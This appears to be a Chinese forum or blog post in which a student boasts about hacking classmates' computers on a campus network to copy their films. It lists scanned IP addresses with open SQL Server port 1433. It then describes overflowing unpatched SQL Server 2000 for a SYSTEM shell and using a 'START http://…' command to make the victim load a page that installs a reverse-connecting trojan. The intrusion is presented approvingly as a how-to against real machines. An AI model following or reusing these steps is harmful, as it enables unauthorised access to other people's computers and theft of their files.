最近,毕业设计也做完了,闲的无聊!每天都是跟同学在一起斗地主,但是斗久了就无聊啊。看片吧,租了几个后,感觉不和算,每次看一个片都得花好几块钱,从别人的电脑里面拷吧!但是现在啊,大家的安全意识都高了,都装了lank>防火墙,(比如:天网,瑞星),更可恨的是现在最新的瑞星病毒lank>防火墙,对每次的溢出攻击都提示,类似“来自:XX。XX。XX。XX的MS04011的攻击”的语句,不仅进不去别人的机器,还被人骂啊,555555555。学校还分了多个VPN,还把135.136.137138。139,445端口都屏蔽了,防止大家互相共享东西,郁闷!
怎么办呢 ?好象大家毕业设计都用SQL2K做的服务器,一般学校的这个网速,补丁是肯定下不了的,大家都没有打,我记得我进学校的一个服务器都是这么进去的,我想大家应该也不会打啊!
拿起superscan4.0扫了下1433的,呵呵强哈,一会就出来N多个保存下来随便看下哈:
* + 202.207.86.186
|___1433Microsoft-SQL-Server
* + 202.207.87.182
|___1433Microsoft-SQL-Server
* + 202.207.91.117
|___1433Microsoft-SQL-Server
* + 202.207.92.117
|___1433Microsoft-SQL-Server
* + 202.207.93.153
|___1433Microsoft-SQL-Server
* + 202.207.93.236
|___1433Microsoft-SQL-Server
* + 202.207.93.242
|___1433Microsoft-SQL-Server
呵呵,虽然不是很多,不过有几个就可以了,我不求别的只求能有几个片就可以了!
拿起SQL工具,溢出,得到CMD的SYSTEM权限,但是我要这个权限没有用啊。我又进不去拷贝不了电影啊!在CMD下面看到不少好片名,郁闷!我想起用TFTP传送一个木马过去,但是不成功!·估计是lank>防火墙不允许!
我在自己的机器开了IIS服务,把FTP也开了,登陆不了FTP。看来这个方法是不行了啊!
那就怎么办呢?看到片名,看不到内容,郁闷得很啊!
突然看到网上有一个遥控下载者,这个代码我到是看过,我突然灵机一动,哈哈,我自己做一个内部的网页,里面加个反弹木马不就可以了!只要他访问,就OK拉!
关键的问题是怎么让他访问这个网页啊!这点最郁闷啊!,我在CMD下虽然拥有SYSTEM权限但是,我却不可以上网啊!郁闷啊!
突然想了下,我自己到SYSTEM,SYSTEM32,WINNT目录下去看看,究竟有多少DOS命令可以用啊。!最后我发现了这个命令:START命令,估计大家都用的少!我把他的HLP贴出来给大家看看!:
启动另一个窗口运行指定的程序或命令。
START ["title"] [/Dpath] [/I] [/MIN] [/MAX] [/SEPARATE | /SHARED]
[/LOW | /NORMAL | /HIGH | /REALTIME | /ABOVENORMAL | /BELOWNORMAL]
[/WAIT] [/B] [command/program]
[parameters]
"title" 在窗口标题栏中显示的标题。
path起始目录
B 在不创建新窗口的情况下开始应用程序。 除非
启动 ^C 处理,否则该应用程序会忽略 ^C 处理;
^Break 是唯一可以中断该应用程序的方式
I 新环境是传递给 cmd.exe 的原始环境,
而不是当前环境
MIN 开始时窗口最小化
MAX 开始时窗口最大化
SEPARATE在分开的空间内开始 16 位 Windows 程序
SHARED在分共享的空间内开始 16 位 Windows 程序
LOW 在 IDLE 优先级类别开始应用程序
NORMAL在 NORMAL 优先级类别开始应用程序
HIGH在 HIGH 优先级类别开始应用程序
REALTIME在 REALTIME 优先级类别开始应用程序
ABOVENORMAL 在 ABOVENORMAL 优先级类别开始应用程序
BELOWNORMAL 在 BELOWNORMAL 优先级类别开始应用程序
WAIT启动应用程序并等候它结束
command/program
如果是内部 cmd 命令或批文件,那么该命令处理器是
用 /K 命令选项运行 cmd.exe 的。这表示该窗口在命令运行
后仍然存在。
如果不是内部 cmd 命令或批文件,则是一个程序,并
作为窗口应用程序或控制台应用程序运行。
parameters这些为传送到命令/程序的参数
如果命令扩展名被启用,通过命令行或 START 命令的外部命令
调用会如下改变:
将文件名作为命令键入,非可执行文件可以通过文件关联调用。
(例如, WORD.DOC 会调用跟 .DOC 文件扩展名关联的应用程序)。
关于如何从命令脚本内部创建这些关联,请参阅 ASSOC 和
FTYPE 命令。
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用
程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
如果执行的命令行的第一个符号是不带扩展名或路径修饰符的
字符串 "CMD","CMD" 会被COMSPEC 变量的数值所替换。这
防止从当前目录抓出 CMD.EXE。
如果执行的命令行的第一个符号没有扩展名,CMD.EXE 会使用
PATHEXT 环境变量的数值来决定要以什么顺序寻找哪些扩展
名。PATHEXT 变量的默认值是:
.COM;.EXE;.BAT;.CMD
请注意,该语法跟 PATH 变量的一样,分号隔开不同的元素。
查找可执行文件时,如果没有相配的扩展名,看一看该名称是否
与目录名相配。如果确实如此,START 会在那个路径上调用
Explorer。如果从命令行执行,则等同于对那个路径作 CD /D。
我直接在CMD下面打"START HTTP://muma"我木马得地址就可以了!
拿起我自己熟悉的木马看着熟悉的木马界面,把一部部MOVIE,COPY过来,过瘾啊!省了不少钱啊!
|
